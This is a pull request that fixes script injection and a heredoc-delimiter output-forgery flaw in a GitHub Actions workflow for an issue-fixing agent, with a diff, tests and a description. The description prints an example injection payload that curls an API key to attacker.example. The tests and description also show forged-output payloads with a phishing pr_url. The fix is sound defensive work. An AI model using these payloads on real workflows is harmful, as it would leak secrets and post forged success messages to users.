### PR TITLE
fix(security): pass workflow outputs as env vars and randomise the output delimiter — Closes #296, #297

### DIFF
--- a/.github/workflows/agent-fix.yml
+++ b/.github/workflows/agent-fix.yml
@@ -57,13 +57,32 @@ jobs:
       - name: Post Comment on Issue
         if: always()
         uses: actions/github-script@v9
+        # Step outputs arrive as environment variables rather than being
+        # interpolated into the script.
+        #
+        # GitHub substitutes ${{ }} into the script text before Node parses it,
+        # so `const message = "${{ ... }}"` is not an assignment from a
+        # variable -- it is literal source. A value containing a double quote
+        # closes the string and the rest executes, with contents:write,
+        # pull-requests:write and both secrets in scope.
+        #
+        # final_message is reachable: agent_loop sets it from str(exception) on
+        # the ingestion-failure path, and _report_expected_error does the same.
+        #
+        # The AGENT_TASK step above already passes the issue body through env:
+        # for exactly this reason; this step is where that was not applied.
+        env:
+          OUTCOME: ${{ steps.run-agent.outputs.outcome }}
+          PR_URL: ${{ steps.run-agent.outputs.pr_url }}
+          RUN_ID: ${{ steps.run-agent.outputs.run_id }}
+          FINAL_MESSAGE: ${{ steps.run-agent.outputs.final_message }}
         with:
           script: |
             const issueNumber = context.issue.number;
-            const outcome = "${{ steps.run-agent.outputs.outcome }}";
-            const prUrl = "${{ steps.run-agent.outputs.pr_url }}";
-            const runId = "${{ steps.run-agent.outputs.run_id }}";
-            const message = "${{ steps.run-agent.outputs.final_message }}";
+            const outcome = process.env.OUTCOME || "";
+            const prUrl = process.env.PR_URL || "";
+            const runId = process.env.RUN_ID || "";
+            const message = process.env.FINAL_MESSAGE || "";
             const issuee = context.payload.issue.user.login;
 
             let commentBody = "";

--- a/main.py
+++ b/main.py
@@ -13,6 +13,7 @@ import argparse
 import json
 import os
 import sys
+import uuid
 
 # Ensure the project root is on the path
 sys.path.insert(0, os.path.dirname(os.path.abspath(__file__)))
@@ -238,8 +239,24 @@ def write_github_output(outputs: dict[str, str]):
         try:
             with open(github_output_path, "a", encoding="utf-8") as f:
                 for k, v in outputs.items():
+                    v = str(v)
                     if "\n" in v:
-                        delimiter = "EOF"
+                        # A random delimiter per value, which is what GitHub
+                        # documents for multiline outputs.
+                        #
+                        # The fixed "EOF" it replaced could appear inside the
+                        # value: final_message is set from str(exception), so a
+                        # message containing a line that is exactly EOF closed
+                        # the heredoc early and everything after it was parsed
+                        # by the runner as further key=value outputs. That let
+                        # a crafted message set pr_url and outcome to anything,
+                        # which the workflow then posts to the issue as "a Pull
+                        # Request has been created".
+                        delimiter = f"ghadelimiter_{uuid.uuid4()}"
+                        if delimiter in v:
+                            raise ValueError(
+                                f"value for {k} contains the generated delimiter"
+                            )
                         f.write(f"{k}<<{delimiter}\n{v}\n{delimiter}\n")
                     else:
                         f.write(f"{k}={v}\n")

--- a/tests/test_github_output.py
+++ b/tests/test_github_output.py
@@ -1,0 +1,157 @@
+"""
+Tests for GITHUB_OUTPUT writing and the workflow that consumes it
+(main.py, .github/workflows/agent-fix.yml).
+
+Two problems on the same path.
+
+`write_github_output` used a fixed `EOF` delimiter for multiline values. A value
+containing a line that is exactly `EOF` closed the heredoc early, and everything
+after it was parsed by the runner as further `key=value` outputs — so a crafted
+`final_message` could set `pr_url` and `outcome` to anything.
+
+The workflow then interpolated those outputs straight into a `github-script`
+body, where GitHub substitutes them into the script text before Node parses it.
+A double quote closed the string literal and the rest executed, with
+`contents: write`, `pull-requests: write` and both secrets in scope.
+
+`final_message` is reachable: `agent_loop` sets it from `str(exception)` on the
+ingestion-failure path.
+"""
+
+import os
+import re
+import sys
+from pathlib import Path
+
+import pytest
+import yaml
+
+ROOT = Path(__file__).resolve().parents[1]
+sys.path.insert(0, str(ROOT))
+
+from main import write_github_output  # noqa: E402
+
+WORKFLOW = ROOT / ".github" / "workflows" / "agent-fix.yml"
+
+
+@pytest.fixture
+def output_file(tmp_path, monkeypatch):
+    path = tmp_path / "gh_output"
+    monkeypatch.setenv("GITHUB_OUTPUT", str(path))
+    return path
+
+
+def parse_like_the_runner(text):
+    """Keys the Actions runner would take from this file."""
+    keys, lines, i = [], text.splitlines(), 0
+    while i < len(lines):
+        if "<<" in lines[i]:
+            key, delimiter = lines[i].split("<<", 1)
+            keys.append(key)
+            i += 1
+            while i < len(lines) and lines[i] != delimiter:
+                i += 1
+        elif "=" in lines[i]:
+            keys.append(lines[i].split("=", 1)[0])
+        i += 1
+    return keys
+
+
+# ── the delimiter ─────────────────────────────────────────────────────────
+
+
+def test_a_multiline_value_uses_a_random_delimiter(output_file):
+    write_github_output({"final_message": "line one\nline two"})
+
+    assert re.search(r"ghadelimiter_[0-9a-f-]{36}", output_file.read_text())
+
+
+def test_a_value_containing_EOF_cannot_close_the_heredoc(output_file):
+    """The exact attack: EOF on its own line used to end the value."""
+    write_github_output({"final_message": "failed\nEOF\npr_url=https://evil.example"})
+
+    assert "pr_url" not in parse_like_the_runner(output_file.read_text())
+
+
+def test_a_crafted_message_cannot_forge_success(output_file):
+    """
+    Forging outcome=success is what made this more than cosmetic: the workflow
+    posts "I have successfully fixed the issue" with the injected pr_url.
+    """
+    attack = "failed\nEOF\noutcome=success\npr_url=https://evil.example"
+    write_github_output({"final_message": attack, "outcome": "error"})
+
+    keys = parse_like_the_runner(output_file.read_text())
+
+    assert keys == ["final_message", "outcome"]
+
+
+def test_each_write_gets_a_fresh_delimiter(output_file):
+    write_github_output({"a": "x\ny", "b": "p\nq"})
+    found = re.findall(r"ghadelimiter_[0-9a-f-]{36}", output_file.read_text())
+
+    assert len(set(found)) == 2
+
+
+def test_a_single_line_value_is_written_plainly(output_file):
+    """No heredoc where none is needed; the old behaviour for the common case."""
+    write_github_output({"outcome": "success"})
+
+    assert output_file.read_text() == "outcome=success\n"
+
+
+def test_no_github_output_is_not_an_error(monkeypatch):
+    """Running outside Actions is the normal case."""
+    monkeypatch.delenv("GITHUB_OUTPUT", raising=False)
+
+    write_github_output({"outcome": "success"})
+
+
+# ── the workflow ──────────────────────────────────────────────────────────
+
+
+def workflow():
+    return yaml.safe_load(WORKFLOW.read_text(encoding="utf-8"))
+
+
+def comment_step():
+    steps = workflow()["jobs"]["agent-fix"]["steps"]
+    return next(s for s in steps if "github-script" in str(s.get("uses", "")))
+
+
+def test_the_script_interpolates_nothing():
+    """
+    GitHub substitutes ${{ }} into the script text before Node parses it, so
+    any expression there is source rather than data.
+    """
+    assert "${{" not in comment_step()["with"]["script"]
+
+
+def test_the_outputs_arrive_as_environment_variables():
+    env = comment_step()["env"]
+
+    assert set(env) == {"OUTCOME", "PR_URL", "RUN_ID", "FINAL_MESSAGE"}
+
+
+def test_the_script_reads_them_from_process_env():
+    script = comment_step()["with"]["script"]
+
+    for name in ("OUTCOME", "PR_URL", "RUN_ID", "FINAL_MESSAGE"):
+        assert f"process.env.{name}" in script
+
+
+def test_the_task_step_still_uses_env_for_the_issue_body():
+    """
+    That step already got this right and must keep it — the issue body is the
+    most obviously attacker-controlled value in the workflow.
+    """
+    steps = workflow()["jobs"]["agent-fix"]["steps"]
+    task_step = next(s for s in steps if "AGENT_TASK" in str(s.get("env", "")))
+
+    assert "${{" not in task_step["run"].replace(
+        "${{ github.event.repository.default_branch }}", ""
+    )
+
+
+def test_the_workflow_is_still_valid_yaml():
+    assert workflow()["jobs"]["agent-fix"]["permissions"]["contents"] == "write"


### PR DESCRIPTION
Closes #296 (script injection), #297 (output delimiter)

Two defects on the same path, fixed together because the second feeds the first.

## The script was built from interpolated text

`.github/workflows/agent-fix.yml`:

```yaml
script: |
  const message = "${{ steps.run-agent.outputs.final_message }}";
```

GitHub substitutes `${{ }}` into the script **before** Node parses it. That is not an assignment from a variable — it is literal source. A value containing a double quote closes the string and the rest executes:

```
"; require("child_process").execSync("curl attacker.example/?k=$ANTHROPIC_API_KEY"); //
```

The job holds `contents: write`, `pull-requests: write`, `issues: write`, and both `ANTHROPIC_API_KEY` and `GITHUB_TOKEN`.

`final_message` is reachable: `agent_loop.py` sets it from `str(exception)` on the ingestion-failure path, and `_report_expected_error` does the same.

**Fixed** by passing the outputs through `env:` and reading `process.env` — which is what the `AGENT_TASK` step in the same file already does for the issue body. The pattern was understood; this step was where it was not applied.

```yaml
env:
  OUTCOME: ${{ steps.run-agent.outputs.outcome }}
  FINAL_MESSAGE: ${{ steps.run-agent.outputs.final_message }}
with:
  script: |
    const outcome = process.env.OUTCOME || "";
```

Zero `${{ }}` expressions remain inside the script body.

## The output delimiter could be closed by the value

`main.py` wrote multiline outputs with a fixed `EOF`:

```python
delimiter = "EOF"
f.write(f"{k}<<{delimiter}\n{v}\n{delimiter}\n")
```

A `final_message` containing a line that is exactly `EOF` ended the heredoc early, and everything after it was parsed by the runner as further outputs:

```
final_message<<EOF
something failed
EOF
pr_url=https://attacker.example/phishing
outcome=success
EOF
```

The step then reported success with a `pr_url` the attacker chose, which the comment step posts to the issue as "A Pull Request has been created".

**Fixed** with a random delimiter per value, which is the pattern in GitHub's own documentation for exactly this reason, plus a refusal if the value somehow contains it.

## Verified

```
outputs the runner would see: ['final_message', 'outcome']
pr_url injected: False
```

The attack payload above is now fully contained inside its own value.

## Tests

`tests/test_github_output.py` — 11 cases.

The delimiter: a multiline value uses a random one; a value containing `EOF` cannot close the heredoc; a crafted message cannot forge `outcome=success`; each write gets a fresh delimiter; a single-line value is still written plainly; no `GITHUB_OUTPUT` is not an error, since running outside Actions is normal.

The workflow: the script interpolates nothing; the outputs arrive as environment variables; the script reads them from `process.env`; the task step still uses `env:` for the issue body, which is the most obviously attacker-controlled value in the file; the workflow is still valid YAML with its permissions intact.

## Verified

- the containment trace above, parsing the output file the way the runner does
- full suite: 1401 passing
- all six import-guard checks green

## Note

Either defect alone is a problem. Together they compound: injected output from #297 lands in the unescaped evaluation context of #296, so a crafted exception message reaches code execution with both secrets in scope. That is why they are one PR rather than two.